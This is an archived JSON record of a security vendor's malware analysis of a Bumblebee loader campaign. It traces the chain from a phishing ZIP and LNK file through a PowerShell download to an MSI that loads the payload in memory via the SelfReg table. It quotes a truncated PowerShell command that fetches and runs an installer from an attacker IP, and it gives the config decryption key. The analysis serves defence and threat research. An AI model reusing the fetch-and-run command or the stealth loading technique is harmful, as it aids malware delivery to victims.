{
	"id": "0f7620d2-3031-4840-87ff-2c253a861d1d",
	"created_at": "2026-04-06T00:08:25.180385Z",
	"updated_at": "2026-04-10T03:24:24.72237Z",
	"deleted_at": null,
	"sha1_hash": "f487973c655ba7c4ce1aa2e3851609192422d5f1",
	"title": "New Bumblebee Loader Infection Chain Signals Possible Resurgence",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 70404,
	"plain_text": "New Bumblebee Loader Infection Chain Signals Possible\r\nResurgence\r\nBy Leandro Fróes\r\nPublished: 2024-10-18 · Archived: 2026-04-05 17:09:35 UTC\r\nSummary\r\nBumblebee is a highly sophisticated downloader malware cybercriminals use to gain access to corporate networks\r\nand deliver other payloads such as Cobalt Strike beacons and ransomware. The Google Threat Analysis Group\r\nfirst discovered the malware in March 2022 and named it Bumblebee based on a User-Agent string it used.\r\nThe Netskope Threat Labs team discovered what seems to be a new infection chain leading to Bumblebee\r\nmalware infection, and our findings corroborate those shared by other researchers. \r\nIn this blog post, we will analyze all the files involved in the chain until the execution of the Bumblebee payload.\r\nKey findings\r\nThis is the first occurrence of a Bumblebee campaign we have seen since Operation Endgame, an operation\r\nperformed by Europol in May 2024 to disrupt the major malware botnets, such as Bumblebee, IcedID, and\r\nPikabot.\r\nThe infection chain used to deliver the final payload is not new, but this is the first time we have seen it\r\nbeing used by Bumblebee.\r\nThese activities might indicate the resurfacing of Bumblebee in the threat landscape.\r\nInitial infection\r\nThe infection likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the\r\nfile inside it. The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of\r\nevents to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on\r\ndisk, as observed in previous campaigns.\r\nLNK and powershell again?\r\nThe usage of LNK files is very common in Bumblebee campaigns, either to download the next stage payloads or\r\nto directly execute files. In this case, the file is used as a downloader and is responsible for downloading and\r\nexecuting the next stage of the infection chain. \r\nOnce opened, the LNK file executes a Powershell command to download an MSI file from a remote server,\r\nrenames it as “%AppData%\\y.msi”, and then executes/installs it using the Microsoft msiexec.exe tool.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 1 of 11\n\n%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe Invoke-WebRequest \"https:///193.242.145.138/mid/w1/\r\nThe option “/qn” is used to make sure there’s no user interaction needed in this step, making the execution of the\r\nLNK file the last step that requires user interaction in the whole chain.\r\nNew MSI approach\r\nUsing MSI files to execute payloads is a very successful technique several adversaries use. Some well-known\r\nmalware families, such as DarkGate and Latrodectus, are examples of how effective this method can be in both\r\nluring users and bypassing defenses.\r\nSimilar to the mentioned cases, the new Bumblebee payload is delivered via MSI files. The analyzed samples are\r\ndisguised as Nvidia and Midjourney installers. They are used to load and execute the final payload all in memory,\r\nwithout even having to drop the payload to disk, as observed in previous campaigns using ISO files.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 2 of 11\n\nRegarding MSI files, most malware, including earlier versions of Bumblebee, use the CustomAction table to\r\nspecify which steps to execute during the MSI installation. LOLBins, such as rundll32.exe and regsvr32.exe are\r\ncommonly used to load malicious DLL via MSI files as well as powershell.exe to execute PowerShell scripts, as\r\nobserved in previous Bumblebee campaigns.\r\nFrom an attacker perspective, the downside of these approaches is that once any of those tools execute, a new\r\nprocess is created, opening the opportunity for defenders to flag unusual events, such as the rundll32 process\r\nbeing created by msiexec. In the analyzed version, Bumblebee uses a stealthier approach to avoid the creation of\r\nother processes and avoids writing the final payload to disk.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 3 of 11\n\nIt does so by using the SelfReg table to force the execution of the DllRegisterServer export function present in a\r\nfile in the File table. The entry in the SelfReg table works as a key to indicate what file to execute in the File table\r\nand in our case it was the final payload DLL.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 4 of 11\n\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 5 of 11\n\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 6 of 11\n\nThe mentioned DLL is present in an CAB file named “disk1” and once the MSI installation starts, the DLL is\r\nloaded in the msiexec process address space and its DllRegisterServer export function is called, leading to the\r\nunpacking and execution of the Bumblebee payload. The following image is an example of the final payload\r\nmapped in the memory of the msiexec process.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 7 of 11\n\nBumblebee payload\r\nBy analyzing the unpacked payload, we can flag some well-known characteristics of Bumblebee, such as its\r\ninternal DLL name and exported functions.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 8 of 11\n\nThe configuration extraction approach is the same as the other versions. The malware uses a clear-text hardcoded\r\nkey as an RC4 key to decrypt the encrypted configuration. \r\nIn the analyzed samples, the key used was the “NEW_BLACK” string. The decrypted port was 443 and the\r\ncampaign ID was “msi” and “lnk001”.\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 9 of 11\n\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 10 of 11\n\nThe full analysis of the Bumblebee payload is out of the scope of this blog post. The Netskope Threat Labs team\r\nwill monitor Bumblebee activities and follow up on the analysis when we have more information.\r\nNetskope Detection\r\nNetskope Advanced Threat Protection provides proactive coverage against this threat.\r\nWin32.Trojan.BumblebeeLNK\r\nWin64.Trojan.BumbleBee\r\nIOCs\r\nAll the IOCs and scripts related to this malware can be found in our GitHub repository.\r\nSource: https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nhttps://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence"
	],
	"report_names": [
		"new-bumblebee-loader-infection-chain-signals-possible-resurgence"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434105,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f487973c655ba7c4ce1aa2e3851609192422d5f1.pdf",
		"text": "https://archive.orkl.eu/f487973c655ba7c4ce1aa2e3851609192422d5f1.txt",
		"img": "https://archive.orkl.eu/f487973c655ba7c4ce1aa2e3851609192422d5f1.jpg"
	}
}